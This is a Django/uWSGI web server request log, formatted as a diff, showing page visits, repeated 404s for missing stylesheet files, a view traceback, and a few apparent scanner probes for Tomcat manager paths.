+[pid: 18965|app: 0|req: 254/354] 117.100.100.38 () {38 vars in 1363 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 255/355] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 256/356] 117.100.100.38 () {38 vars in 1355 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 257/357] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 258/358] 117.100.100.38 () {38 vars in 1319 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 259/359] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 260/360] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:38:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 261/361] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:38:02 2021] GET /static/css/spinners.css => generated 3433 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 262/362] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:38:02 2021] GET /static/css/animate.css => generated 3430 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 263/363] 117.100.100.38 () {40 vars in 1400 bytes} [Fri Jan 8 15:38:03 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 264/364] 117.100.100.38 () {40 vars in 1402 bytes} [Fri Jan 8 15:38:03 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 265/365] 117.100.100.38 () {38 vars in 1353 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 266/366] 117.100.100.38 () {38 vars in 1365 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 267/367] 117.100.100.38 () {38 vars in 1321 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 268/368] 117.100.100.38 () {38 vars in 1357 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 269/369] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 270/370] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 271/371] 117.100.100.38 () {38 vars in 1397 bytes} [Fri Jan 8 15:38:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 272/372] 117.100.100.38 () {38 vars in 1290 bytes} [Fri Jan 8 15:38:04 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 273/373] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:38:04 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 274/374] 117.100.100.38 () {40 vars in 1401 bytes} [Fri Jan 8 15:38:05 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 275/375] 117.100.100.38 () {40 vars in 1403 bytes} [Fri Jan 8 15:38:05 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 276/376] 117.100.100.38 () {38 vars in 1353 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 277/377] 117.100.100.38 () {38 vars in 1357 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 278/378] 117.100.100.38 () {38 vars in 1365 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 279/379] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 280/380] 117.100.100.38 () {38 vars in 1321 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 281/381] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 282/382] 117.100.100.38 () {38 vars in 1397 bytes} [Fri Jan 8 15:38:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 283/383] 117.100.100.38 () {38 vars in 1289 bytes} [Fri Jan 8 15:38:05 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 284/384] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:38:05 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /manager/text/list
+[pid: 18965|app: 0|req: 285/385] 192.241.225.100 () {30 vars in 378 bytes} [Fri Jan 8 15:46:14 2021] GET /manager/text/list => generated 3415 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 286/386] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:46:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 287/387] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:46:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 288/388] 83.97.20.21 () {22 vars in 227 bytes} [Fri Jan 8 15:46:34 2021] OPTIONS / => generated 52541 bytes in 27 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 289/389] 117.100.100.38 () {38 vars in 1307 bytes} [Fri Jan 8 16:04:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 290/390] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 16:05:26 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 291/391] 117.100.100.38 () {48 vars in 1473 bytes} [Fri Jan 8 16:05:34 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 292/392] 117.100.100.38 () {40 vars in 1379 bytes} [Fri Jan 8 16:05:34 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 293/393] 117.100.100.38 () {38 vars in 1334 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 294/394] 117.100.100.38 () {38 vars in 1346 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 295/395] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 296/396] 117.100.100.38 () {38 vars in 1302 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 297/397] 117.100.100.38 () {38 vars in 1322 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 298/398] 117.100.100.38 () {38 vars in 1322 bytes} [Fri Jan 8 16:05:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 299/399] 117.100.100.38 () {38 vars in 1378 bytes} [Fri Jan 8 16:05:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 300/400] 117.100.100.38 () {38 vars in 1270 bytes} [Fri Jan 8 16:05:35 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 301/401] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 16:05:35 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 302/402] 117.100.100.38 () {40 vars in 1366 bytes} [Fri Jan 8 16:05:36 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 303/403] 117.100.100.38 () {40 vars in 1369 bytes} [Fri Jan 8 16:05:39 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 304/404] 117.100.100.38 () {48 vars in 1464 bytes} [Fri Jan 8 16:06:05 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 305/405] 117.100.100.38 () {40 vars in 1337 bytes} [Fri Jan 8 16:06:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 306/406] 93.136.9.223 () {28 vars in 402 bytes} [Fri Jan 8 16:12:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 307/407] 109.245.241.93 () {28 vars in 404 bytes} [Fri Jan 8 16:15:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 308/408] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 16:36:35 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 309/409] 117.100.100.38 () {42 vars in 1417 bytes} [Fri Jan 8 16:45:18 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 310/410] 117.100.100.38 () {38 vars in 1336 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 311/411] 117.100.100.38 () {38 vars in 1304 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 312/412] 117.100.100.38 () {38 vars in 1348 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 313/413] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 314/414] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 315/415] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 316/416] 117.100.100.38 () {38 vars in 1380 bytes} [Fri Jan 8 16:45:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 317/417] 117.100.100.38 () {38 vars in 1272 bytes} [Fri Jan 8 16:45:18 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 318/418] 117.100.100.38 () {38 vars in 1270 bytes} [Fri Jan 8 16:45:18 2021] GET /static/css/animate.css => generated 3430 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 319/419] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 16:45:19 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 320/420] 117.100.100.38 () {38 vars in 1349 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 321/421] 117.100.100.38 () {38 vars in 1341 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 322/422] 117.100.100.38 () {38 vars in 1337 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 323/423] 117.100.100.38 () {38 vars in 1325 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 324/424] 117.100.100.38 () {38 vars in 1325 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 325/425] 117.100.100.38 () {38 vars in 1305 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 326/426] 117.100.100.38 () {38 vars in 1381 bytes} [Fri Jan 8 16:45:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 327/427] 117.100.100.38 () {38 vars in 1273 bytes} [Fri Jan 8 16:45:19 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 328/428] 117.100.100.38 () {38 vars in 1271 bytes} [Fri Jan 8 16:45:19 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 329/429] 117.100.100.38 () {40 vars in 1384 bytes} [Fri Jan 8 16:45:20 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 330/430] 117.100.100.38 () {38 vars in 1335 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 331/431] 117.100.100.38 () {38 vars in 1347 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 332/432] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 333/433] 117.100.100.38 () {38 vars in 1339 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 334/434] 117.100.100.38 () {38 vars in 1303 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 335/435] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 336/436] 117.100.100.38 () {38 vars in 1271 bytes} [Fri Jan 8 16:45:20 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 337/437] 117.100.100.38 () {38 vars in 1379 bytes} [Fri Jan 8 16:45:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 338/438] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 16:45:20 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 339/439] 117.100.100.38 () {40 vars in 1331 bytes} [Fri Jan 8 16:45:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 340/440] 192.241.194.160 () {30 vars in 368 bytes} [Fri Jan 8 16:57:56 2021] GET /manager/html => generated 3400 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 341/441] 42.236.10.75 () {34 vars in 797 bytes} [Fri Jan 8 17:17:57 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 342/442] 42.236.10.75 () {40 vars in 883 bytes} [Fri Jan 8 17:17:58 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 343/443] 42.236.10.84 () {38 vars in 852 bytes} [Fri Jan 8 17:17:58 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/444] 42.236.10.84 () {40 vars in 919 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/445] 42.236.10.75 () {40 vars in 942 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/446] 42.236.10.93 () {40 vars in 922 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/447] 42.236.10.78 () {40 vars in 924 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/448] 42.236.10.78 () {40 vars in 928 bytes} [Fri Jan 8 17:17:59 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
